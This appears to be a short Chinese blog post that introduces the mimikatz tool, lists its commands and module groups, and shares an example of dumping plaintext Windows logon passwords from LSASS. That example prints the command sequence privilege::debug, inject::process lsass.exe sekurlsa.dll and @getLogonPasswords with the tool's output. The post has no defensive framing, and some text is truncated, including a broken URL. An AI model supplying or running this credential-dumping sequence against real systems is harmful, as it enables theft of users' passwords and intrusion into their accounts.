|
mimikatz是法国的一位神牛写的神器,该神器有很强大的功能,据说已经被集成在metasplo 1.常规的操作使用命令 mimikatz # cls –>清屏,类似dos命令cls. mimikatz # exit –>退出mimikatz. mimikatz #version –>查看当前的mimikatz的版本. 随便输入”xxx::”,会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令 2.系统方面的操作使用命令:system mimikatz #system::user –>查看当前登录的系统用户 mimikazt #system::computer –>返回当前的计算机名称 3.在服务器终端的操作命令: ts mimikatz #ts::sessions –>显示当前的会话 mimikatz #ts::processes windows-d.vm.nirvana.local –>显示服务器的进程和对应的pid情况等。 4.系统服务相关的操作使用命令:service 5.系统进程相关操作的使用命令:process 6.系统线程相关操作使用命令:thread 7.系统句柄相关操作使用命令:handle 8.加密相关操作使用命令:crypto 9.注入操作使用命令:inject 具体的各种神器功能使用有待神人挖掘,表示不会外文压力很大…… 分享从lsass抓去系统的明文密码案例: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */ mimikatz # privilege::debug Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # inject::process lsass.exe sekurlsa.dll SekurLSA : librairie de manipulation des données de sécurités dans LSASS mimikatz # @getLogonPasswords 作者blog:http://blog./mimikatz |
|
|
